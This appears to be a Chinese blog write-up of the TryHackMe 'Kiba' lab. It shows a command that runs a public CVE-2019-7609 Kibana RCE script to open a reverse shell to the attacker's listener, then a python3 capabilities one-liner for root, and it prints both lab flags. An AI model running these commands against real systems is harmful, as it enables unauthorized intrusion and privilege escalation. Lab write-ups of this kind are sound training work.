打靶记录(十九)之THMkiba
端口扫描
最近连thm的网络好像不太稳,nmap扫描也出了点问题。。。
Web
这界面和之前打的vulnhub那台好像,提示了cap的提权方式?
扫目录没扫出什么东西,80端口就是没什么东西
搜了一下5601端口,发现是一个叫做kibana的服务,和这个房间的名字挺符合,访问看一下
进了一个管理界面
先看房间的第一个问题
在这个界面找到版本号
Getshell
能直接搜到CVE
https://github.com/LandGrey/CVE-2019-7609
开启监听
python2 CVE-2019-7609-kibana-rce.py -u http://10.10.234.34:5601 -host 10.14.52.15 -port 1234 --shell |
成功连接
user.txt
THM{1s_easy_pwn3d_k1bana_w1th_rce}
提权
既然房间都提示那么明显了,就是用cap文件来提权
getcap -r 来递归列举全部cap文件
但最好把报错信息丢弃
getcap -r / 2>/dev/null |
能用python3,直接
/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' |
root.txt
THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es}
碎碎念
好简单的房间,没啥好说的233
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 MikannseのSekai!
评论
ValineDisqus